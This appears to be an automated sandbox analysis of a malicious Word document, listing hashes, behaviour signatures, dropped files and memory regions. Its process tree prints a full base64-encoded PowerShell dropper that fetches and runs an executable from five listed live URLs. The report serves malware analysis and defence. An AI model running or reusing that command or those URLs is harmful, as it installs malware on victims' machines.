Resubmissions

Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17/02/2025, 22:37

General

  • Target

  • Size

    139KB

  • MD5

    b92021ca10aed3046fc3be5ac1c2a094

  • SHA1

    0fb1ad5b53cdd09a7268c823ec796a6e623f086f

  • SHA256

    c378387344e0a552dc065de6bfa607fd26e0b5c569751c79fbf9c6f2e91c9807

  • SHA512

    bbeb5cfd7c5a890456b0805234a9ae325abc4a08dbad70b4ed1b3635dee4470a1f86869d5532809cecb595b9a89708f378921d733bd061aef693bfc5ee77ebb4

  • SSDEEP

    3072:/Msknok2er/yR5DpQKajNDu1CkBwN0pqJfWSq:zkoRoKDpQZqQkmN0scR

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2436
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1616

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1987872E.wmf

      Filesize

      430B

      MD5

      f1ebd8641fff5879aa6c34a93bb737e5

      SHA1

      0eee2f4a0213242ae5eba1499def71998a2a6da8

      SHA256

      342922d17796672398fb0957b947be7962fe5c6d05b18648f97a30bf48bad68b

      SHA512

      4bc87111e67cd55aa1572eeba6d90dcc0f28aa6f6fcb7b311254cdfdac29f09c66f680a7527921a20768ccb85610aad1bc18d7df5070414db95421b10a5c9934

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\229D7B16.wmf

      Filesize

      430B

      MD5

      7863f1a3e40a350ad3453c6b5153b437

      SHA1

      5b65a1e2c3c786f0b5f9fedb0392dfccfa51a9e5

      SHA256

      c750999c820c90a3f8e54a1dc53395d54c5ff0b1814927a514181870c70b1b74

      SHA512

      dcfdb7bb7cb99a543e2e87ca3cc4d4207afdb39ce9ba6bcdbe96003347029caca606d07e2977b18b7a8db201f2912380eb2097d1fc416a1a7fd01312ea0dfeea

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\252C1BDB.wmf

      Filesize

      430B

      MD5

      187f1c014793c1fd71f82e5c41fe7701

      SHA1

      07f9a0f6c7fff45aa76770a790bd59ebea807084

      SHA256

      31f498807390891c455125d6a35a917a08486c23902548cc8b2cfb7b187cecb4

      SHA512

      eb8ba63d4e10a9d7ca2db6de378f578700bb6a912fec5be04e6c874a1831284e35eaf9f3676ac04690f43c9a1e377a0e98659f3a58e7e7da7c066a658b21bbd6

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29227DA1.wmf

      Filesize

      430B

      MD5

      1aa003d2471b1bd3b49bf612a22a88ed

      SHA1

      85bc255b1c7293207cf8e639782d657831c8380c

      SHA256

      d0d58351659fbfbd00bc483f3b077e3c87be78073e4c9d91a5d2a3d8ab51b1bf

      SHA512

      423a7b4d3825f71813e7c944fbc5b89fc99407c1d3394709860a049a9b8bf5f107f52a0637d82aa85be88d0022f504c6da4832a81cecd7c3eb47042e1b79c603

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2926AE23.wmf

      Filesize

      430B

      MD5

      3d1124cfe3ec421e0cb3ee85fac05748

      SHA1

      6c32d336dbd9e63bd8213defee0a9ac213b4610b

      SHA256

      859bff0e507cc77536af14526d8cf39b6afb5623fa8f19201f9b4e405714af20

      SHA512

      023a76c61c4a3a275d7e98dc136c30ebacebe66d0cdf16ba0f94fd9b7e8748851855c9b461e365c9a535a3dd06c231824f564a595ef3a45ee08d1865f34fa372

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2EB9AC20.wmf

      Filesize

      430B

      MD5

      033d246a9a0d6cc408dd0fa973d427ce

      SHA1

      3895b3d9abba45ccf1ca9cf216d1ac03fa09bd0f

      SHA256

      0c67cb7a1a9b297d0adb12d4d2270d7e214f51cfca5a8621161133aa9dc9e668

      SHA512

      8ef00ef5000460728dbece81a7bd68afe19daedcafeecb20c8edb76571a61ec22259d7b0610ddb31facbc927e3db470dcd65a284e7662a6df7834454fb56c958

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4DDEEF29.wmf

      Filesize

      430B

      MD5

      a9c99217cac2a8bb68030d8ab3ee5777

      SHA1

      cfbf0271c3913c413edcd610a966b0fc27f80b1c

      SHA256

      eca84616e304ce309ad3a2a234b6be34f2ae8a0157dd84e2b81a75710dd991b3

      SHA512

      a37dd7f78816ace1e155f7bf03988f0e1c44a5793ff29f066bfa31042554f2099c7f1540f456ac7bd54f1378e6b804148c18208ebee7c7606645286482580c09

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\591B8F94.wmf

      Filesize

      430B

      MD5

      b4ae72b23ebb9874fa1828c8722ed757

      SHA1

      34c484550af9bc7ceb8d556834d05a9e86b7e8b4

      SHA256

      9b567f95bf4cf1276c56323bf3308b49267a7e030ff7c5776092e0b8ae8133ce

      SHA512

      0b0c2c572cac4530840d505b8243575b9140f528b41f97427b506b6cff0434053421a0e82b1cc9ca6da161e37cb4e606e4a0671a309ccf76ed4c45c06c515589

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F445EC2.wmf

      Filesize

      430B

      MD5

      ca7fe3c192235675ebd4399b48d4103c

      SHA1

      953b68dd56f3605f02b9cab68af0497f8191c0b2

      SHA256

      f029506fd03711b4c4053f1282b9620c6373b4ff81c89ece1faf73bf3fb8f40a

      SHA512

      cb2a96d5e3a4582f0d08bd1402013ba796a593d4c15c44a8c81667f9d3bf49a32aabfe0c1eba03f2c6b2330bd791cec225472a24cd6044e73a1d832e17d025ec

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\81C3C9C8.wmf

      Filesize

      430B

      MD5

      3f061a9fd528a87e22ed872c725500cf

      SHA1

      ada6a66a6f4bf5e46022542d1c0c88e4ab95d746

      SHA256

      c38de8ba47be740bd7ecd6054413df41ec09d0c8440b35c3f40584f0e1f13b36

      SHA512

      608a5f24d6bf0abbd01dbeb947895fcb76eb99192bfbb33f16e101d79c0705517d2a053a732fc6fe7951484052fa86311a891052affaf8de00df546364adba8d

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8630041F.wmf

      Filesize

      430B

      MD5

      36cbd74fbb7920147ca8717e02387b76

      SHA1

      cc03b31e232d7218c47d7ef5d386e92391e5c6af

      SHA256

      59ddadc9b7eed8befbde689bfd0fbd06d8a42f0e31966abb8cb774ee9717101d

      SHA512

      243ca8106a17bd84e260e452badc3433729c3348e922ac0f70348b6d812ccf77d527eac8783fa5f20761f507277a660a62e1bc44f853c91b85d1cafbe00cdedd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\870F4285.wmf

      Filesize

      430B

      MD5

      103a06ae21ad87b0f5cd3b71d5fe6b3a

      SHA1

      da3e339bff7ac1bebe70fb332e43981bb2a158d0

      SHA256

      6f23c94b06a1da3b61e0c2d0930d8fc02bf8d833831abe00206f28373e6864b3

      SHA512

      96d59fd1cbd5b3064dab10dd48a20bc66a02381061074191658e5f10aa7cbe4da168e9708a9fa519aeaa4b5a51e0bf43c71a646d5aa1040de971c5110f61253d

    • memory/1616-157-0x0000000002710000-0x0000000002718000-memory.dmp

      Filesize

      32KB

    • memory/1616-156-0x000000001B610000-0x000000001B8F2000-memory.dmp

      Filesize

      2.9MB

    • memory/2436-149-0x0000000005560000-0x0000000005660000-memory.dmp

      Filesize

      1024KB

    • memory/2436-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2436-145-0x0000000005560000-0x0000000005660000-memory.dmp

      Filesize

      1024KB

    • memory/2436-147-0x0000000005560000-0x0000000005660000-memory.dmp

      Filesize

      1024KB

    • memory/2436-148-0x0000000005560000-0x0000000005660000-memory.dmp

      Filesize

      1024KB

    • memory/2436-65-0x0000000005740000-0x0000000005840000-memory.dmp

      Filesize

      1024KB

    • memory/2436-150-0x0000000007070000-0x0000000007270000-memory.dmp

      Filesize

      2.0MB

    • memory/2436-2-0x000000007119D000-0x00000000711A8000-memory.dmp

      Filesize

      44KB

    • memory/2436-0-0x000000002F1D1000-0x000000002F1D2000-memory.dmp

      Filesize

      4KB

    • memory/2436-170-0x000000007119D000-0x00000000711A8000-memory.dmp

      Filesize

      44KB

    • memory/2436-171-0x0000000005740000-0x0000000005840000-memory.dmp

      Filesize

      1024KB

    • memory/2436-172-0x0000000005560000-0x0000000005660000-memory.dmp

      Filesize

      1024KB

    • memory/2436-173-0x0000000007070000-0x0000000007270000-memory.dmp

      Filesize

      2.0MB